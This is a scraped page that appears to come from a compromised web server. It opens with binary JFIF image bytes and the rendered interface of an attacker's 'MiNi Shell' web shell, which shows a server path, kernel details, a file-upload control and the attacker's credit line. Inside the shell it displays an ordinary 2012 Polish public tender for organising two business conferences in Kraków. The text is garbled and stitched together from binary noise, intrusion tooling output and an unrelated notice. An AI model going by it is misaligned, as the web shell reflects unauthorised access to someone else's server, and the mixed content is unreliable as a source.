JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/6199-N-2012.html

<p class="kh_header"><b>Kraków: Kompleksowa organizacja dwóch konferencji: pierwszej, dla przedstawicieli firm branży SSC (Shared Services Centre) i BPO (Business Processes Outsourcing) oraz  drugiej, tzw. eksportowej Kraków - Paczółtowice</b><br>
<b>Numer ogłoszenia: 6199 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolska Agencja Rozwoju Regionalnego S.A. , ul. Kordylewskiego 11, 31-542 Kraków, woj. małopolskie, tel. 012 6176600, faks 012 6176666.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ww.marr.pl/1przetargi-aktualne.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa organizacja dwóch konferencji: pierwszej, dla przedstawicieli firm branży SSC (Shared Services Centre) i BPO (Business Processes Outsourcing) oraz  drugiej, tzw. eksportowej Kraków - Paczółtowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.2. Przedmiotem zamówienia jest kompleksowa organizacja:
1.2.1. [konferencja nr 1] 3-dniowej konferencji dla przedstawicieli firm branży SSC (Shared Services Centre) i BPO (Business Processes Outsourcing) dla ok. 500 osób(wraz z imprezami towarzyszącymi) oraz
1.2.2. [konferencja nr 2] konferencji eksportowej Kraków - Paczółtowice dla ok. 100 osób - w tym dla przedsiębiorców zainteresowanych rozwojem eksportu, dla przedstawicieli WPHI oraz zagranicznych placówek dyplomatycznych. Konferencja będzie trwać 2 dni: w Krakowie (pierwszy dzień) oraz w Paczółtowicach (drugi dzień)
1.3. W zakres przedmiotu zamówienia wchodzą w szczególności:
1.3.1. dla konferencji nr 1:
zapewnienie miejsc noclegowych dla uczestników w ilości min. 200  płatnych przez uczestników;
zapewnienia obsługi 5 gości VIP: m.in. hotel o wysokim standardzie (5* znajdujący się na terenie Starego Miasta w Krakowie), transport 
z i na lotnisko, z i na miejsce, przygotowanie (odebranie) materiałów, kontakty bieżące, etc.
zapewnienie i przygotowanie sali konferencyjnej wraz z wyposażeniem 
w prestiżowej lokalizacji konferencji w Krakowie (partner zamawiającego, jako współorganizator konferencji, dokonał wstępnej rezerwacji sali konferencyjnej w hotelu Sheraton w terminie konferencji nr 1 (na wszelki wypadek, jeżeli wykonawca nie wybierze innej odpowiedniej lokalizacji) 
zapewnienie sali audytoryjnej w jednej z renomowanych krakowskich uczelni (UJ, AGH, UEK)
zorganizowania Spotkania z Gosciem Specjalnym w drugim  dniu konferencji a po spotkaniu  zorganizowania wydarzenia networkingowego umożliwiającego poznanie się i wymianę doświadczeń między uczestnikami. Organizacja spotkania z Gościem Specjalnym  w godz. 18:30 - 20:00  oraz spotkania networkingowego  w godz. 20:00 - 22:30 w prestiżowej lokalizacji (w obrębie ścisłego centrum Krakowa, tj. Podgórze, Kazimierz, Stare Miasto);
zapewnienie kabin dla tłumaczy oraz tłumaczenia symultanicznego 
(angielski - polski, polski - angielski);
zapewnienie oprawy informacyjnej konferencji;
zapewnienie oprawy graficznej konferencji;
zapewnienia oprawy medialnej konferencji;
zorganizowanie obsługi cateringowej konferencji;
zorganizowania wydarzeń towarzyszących dla uczestników (wycieczek fakultatywnych)   dla osób które wyrażą takie życzenie przy rejestracji na konferencję (wydarzenia typu: zwiedzanie Wieliczki,  rejs statkiem po Wiśle, wycieczka do Auschwitz, gra w golfa, itp.) - płatne przez uczestników. Rozliczenie dotyczące uczestnictwa gości w wydarzeniach towarzyszących nie będzie przedmiotem Umowy między Zamawiającym a Wykonawcą. Program wycieczek oraz daty i godziny wyjazdów do zaproponowania przez Wykonawcę;
zapewnienia anglojęzycznego biura konferencji  - (sekretariatu  działającego minimum 3 miesiące przed planowaną datą konferencji do 2 dni po  zakończeniu   konferencji;
zapewnienie obsługi translatorskiej;
przygotowania relacji video z całego wydarzenia oraz dokumentacji fotograficznej (min. 100 zdjęć w optymalnej rozdzielczości i przekazanie ich Zamawiającemu najpóźniej 7 dni po konferencji z przeniesieniem praw autorskich do powstałego utworu
zapewnienie obsługi technicznej konferencji;
Zapewnienia dostępu do Internetu bezprzewodowego dla wszystkich uczestników konferencji;
wykonania strony internetowej konferencji;
Zapewnienie transportu w godzinach 10:00 - 13:00 dla min. 50 gości uczestniczących w wizytach studyjnych w Krakowie i okolicach podczas pierwszego  dnia konferencji;
Termin realizacji zamówienia w zakresie dotyczącym konferencji nr 1: 23-25 maja 2012r..
1.3.2. dla konferencji nr 2:
zapewnienie miejsc noclegowych dla uczestników w ilości min. 90  płatnych przez uczestników;
zapewnienia obsługi 5 gości VIP: m.in. hotel o wysokim standardzie (5* znajdujący się na terenie Starego Miasta w Krakowie), transport 
z i na lotnisko, z i na miejsce, przygotowanie (odebranie) materiałów, kontakty bieżące, etc.
przygotowanie sal konferencyjnych wraz z wyposażeniem w prestiżowej lokalizacji konferencji w Krakowie;
zapewnienie kabin dla tłumaczy oraz tłumaczenia symultanicznego 
(angielski - polski, polski - angielski);
zapewnienie oprawy graficznej konferencji;
zapewnienia oprawy medialnej konferencji;
zorganizowania w pierwszym i drugim dniu konferencji cateringu (wg menu wskazanego przez zamawiającego) przy jednoczesnym zapewnieniu pomieszczenia cateringowego oraz obsługi cateringowej na 100 osób;
zorganizowania w II dniu części networkingowej w Paczółtowicach 
w centrum konferencyjnym Krakow - Valley Golf (nauka gry w golfa; rozrywka na strzelnicy, inne;
zapewnienie w II dniu konferencji transportu dla jej uczestników.
termin wykonania zamówienia w części dotyczącej konferencji nr 2: do 10 czerwca 2012roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7, 79.95.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy którzy posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1. W postępowaniu mogą wziąć udział Wykonawcy którzy posiadają niezbędną wiedzę i doświadczenie wyrażające s zrealizowaniem 
w ciągu ostatnich 3 lat przed upływem terminu składania ofert minimum 3 usług polegających na zorganizowaniu konferencji/sympozjum/forum z których każde spełnia co najmniej następujące wymogi:
a) minimalna liczba uczestników min. 400 osób;
b) budżet min. 250 tys. pln
c) miejsce, w którym odbyła się konferencja - obiekt zamknięty, np. hotel, centrum konferencyjne, centrum biznesowe, teatr;
Zakres każdej z usług winien obejmować co najmniej zapewnienie pomieszczeń 
i wyposażenia, obsługę techniczną konferencji, świadczenie usług gastronomicznych oraz tłumaczenie symultaniczne. Zakres przynajmniej dwóch 
z usług winien obejmować zapewnienie miejsc noclegowych.
W przypadku, gdy kwoty wykazanych przez Wykonawcę usług wyrażone będą 
w walucie innej niż PLN Zamawiający, w celu oceny spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia do wykonania zamówienia dokona przeliczenia wartości tych kwot z walut obcych na PLN przy zastosowaniu średniego kursu NBP z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.2. W postępowaniu mogą wziąć udział Wykonawcy którzy dysponują:
a) (na potrzeby konferencji nr 1) salą konferencyjną w obiekcie typu: Hotel Sheraton lub równoważne (5*standard hotelu zgodnie z rozporządzeniem Ministra Gospodarki i Pracy w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie z dnia 19 sierpnia 2004 r.  (Dz. U.  Nr 188, poz. 1945)ze zm, posiadającym min. 1 salę plenarną z możliwością podziału na mniejsze, zlokalizowanym w obrębie tzw. drugiej obwodnicy Krakowa ewentualnie tuż przy niej (nie dalej niż 2 km [wg wskazań Google maps dla pieszych]) oraz
b) (na potrzeby konferencji nr 2) salą konferencyjną w prestiżowej lokalizacji  na min. 120 osób o. Sala winna być wyposażona minimum w:
wentylację/klimatyzację
instalację do zaciemniania
sieć WiFi/LAN
Telewizor 50 cali
Tablica Flip Chart
Projektor multimedialny Acer
Ekran projekcyjny
Nagłośnienie oraz mikrofon bezprzewodowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.3. W postępowaniu mogą wziąć udział Wykonawcy którzy dysponują zdolnymi do wykonania zamówienia:
a) koordynatorem, posiadającym:
1.3.a.1. znajomość języka angielskiego co najmniej na poziomie B2 wg skali Rady Europy,
1.3.a.2. doświadczenie w koordynacji co najmniej trzech: konferencji i/lub seminarium i/lub spotkania i/lub kongresu, przy czym w każdej/ym z nich:
uczestniczyło co najmniej 300 osób,
kierował zespołem co najmniej 7 osób
organizacja obejmowała co najmniej zapewnienie powierzchni konferencyjnej, obsługę techniczną, usługi gastronomiczne;
b) specjalistą ds. public relations posiadającym min. 36 - miesięczne doświadczenie zawodowe;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy którzy znajdują się w sytuacji finansowej i ekonomicznej zapewniającej wykonanie zamówienia wyrażającej się posiadaniem środków finansowych lub zdolności kredytowej w wysokości min. 250 000 pln</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie wykonawcy - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany Umowy, gdy:
1) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Zamówienia; 
2) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną;
3) wystąpi konieczność wprowadzenia zmian terminów realizacji umowy na skutek zaistnienia obiektywnych przeszkód, które uniemożliwią realizację umowy lub osiągnięcie jego celów; 
4) w związku ze stwierdzonymi rozbieżnościami w umowie i załącznikach wystąpi potrzeba ich ujednolicenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.marr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Obsługi Inwestora:
ul. Jana Pawła II 41 L
31 - 864 Kraków 
tel. 12 620 91 63 fax: 12 620 91 66 
e-mail: lukasz.wojdyla@marr.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego przy ul. Kordylewskiego 11, 31-542 Kraków, w sekretariacie, pokój nr 419.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie jest realizowane w ramach projektu Business in Małopolska - Inwestycja w Przyszłość oraz jest współfinansowane przez UE w ramach MRPO na lata 2007-1013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com